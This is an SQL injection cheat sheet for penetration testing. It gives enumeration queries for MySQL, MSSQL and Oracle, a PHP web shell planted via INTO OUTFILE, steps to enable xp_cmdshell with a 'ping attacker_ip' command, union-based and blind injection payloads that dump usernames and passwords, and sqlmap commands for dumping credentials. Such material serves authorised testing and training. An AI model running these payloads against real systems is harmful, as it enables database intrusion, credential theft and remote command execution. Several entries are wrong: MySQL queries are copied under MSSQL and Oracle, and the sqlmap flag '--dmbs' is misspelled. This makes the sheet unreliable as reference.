Enumeration

Gather some juicy info to move to higher privileges

MySQL

Information SQL Query
Database Version select @@version
Current Database select database()
Get other databases name select schema_name from information_schema.schemata
Database User select user()
select system_user()
Database user, password hashes select host, user, password from mysql.user
Tables Name select table_schema,table_name from information_schema.tables
select table_name from information_schema.tables where table_schema='userdb'
Columns Name select table_name, column_name **from** information_schema.columns
select column_name **from** information_schema.columns where table_name = 'usertable'
Read system Files select load_file('/etc/hosts')
Write to File select "<?php system($_GET['cmd']); ?>",2,3,4 into outfile '/var/www/html/legit.php'

MSSQL

Information SQL Query
Database Version select @@version;
Current Database select db_name();
Get available databases name select name from master..sysdatabases;
If DBA SELECT is_srvrolemember('sysadmin');
Database user, password hashes select host, user, password from mysql.user;
Tables Name select table_schema,table_name from information_schema.tables;
select table_name from information_schema.tables where table_schema='userdb';
Columns Name select table_name, column_name **from** information_schema.columns;
select column_name **from** information_schema.columns where table_name = 'usertable';
XP_CMDSHELL sp_configure 'show advanced options', 1;RECONFIGURE;GO
sp_configure 'xp_cmdshell', 1;RECONFIGURE;GO
EXEC xp_cmdshell 'ping attacker_ip'

Oracle

Information SQL Query
Database Version SELECT banner FROM v$version;
SELECT version FROM v$instance;
Current Database SELECT SYS.DATABASE_NAME FROM DUAL;
SELECT instance_name FROM V$INSTANCE;
Get available databases name SELECT DISTINCT owner FROM all_tables;
Get DBA Accounts SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES';
Database user, password hashes select host, user, password from mysql.user;
Tables Name SELECT table_name FROM all_tables;
SELECT table_name FROM all_tables WHERE owner='web_db';
Columns Name SELECT column_name FROM all_tab_columns WHERE table_name = 'users' and owner='web_db';

Exploitation

Understanding Manual attack is required instead of using a tool blindly. If we don’t understand manual attack then we won’t be able to find out why a tool not working and how to do it manually when required.

MySQL Error Based Manual Example

#Find how many columns
id=1 order by 1 #No Error
id=1 order by 2 #No Error
id=1 order by 3 #No Error
id=1 order by 1 # Error

#Find vulnerable column
id=1 union select null,2,3 #Error
id=1 union select 1,null,3 #### No Error

#Get Table name
id=1 union select 1,table_name,3 from information_schema.tables

#Get Columns name from a table
id=1 union select 1,column_name,3 from information_schema.columns where table_name = 'users'

#Get contents from columns
id=1 union select 1,concat(username,0x3a,password),3 FROM users

Bolean based Blind SQL Injection

#Verify
id=1 AND '1'='1 #Load Normally
id=1 AND '1'='2 #If the site vulnerable page won't load normally

#Check if the table name start with 'a'. If it is true page will load normally.
id=1 AND SUBSTRING((select table_name from information_schema.tables where table_schema=database() limit 0,1), 1, 1) = a

id=1 AND SUBSTRING((select table_name from information_schema.tables where table_schema=database() limit 0,1), 1, 1) = b

SQLMAP

Sqlmap is a powerful popular tool to exploit sql injection. This tool can exploit All possible SQL Injection vulnerability.

#Capture the request using burp suite and save to a file called post.txt, then:
sqlmap -r post.txt --technique E --threads 5 --current-db --dmbs=mysql

#Find tables
sqlmap -r post.txt --technique E --threads 5 --dmbs=mysql -D database --tables

#Find Columns
sqlmap -r post.txt --technique E --threads 5 --dmbs=mysql -D database -T users --columns

#Dump contents
sqlmap -r post.txt --technique E --threads 5 --dmbs=mysql -D database -T Users --sql-query="select username,password from users"

Reference:

https://sqlwiki.netspi.com/attackQueries/informationGathering/

https://portswigger.net/web-security/sql-injection/cheat-sheet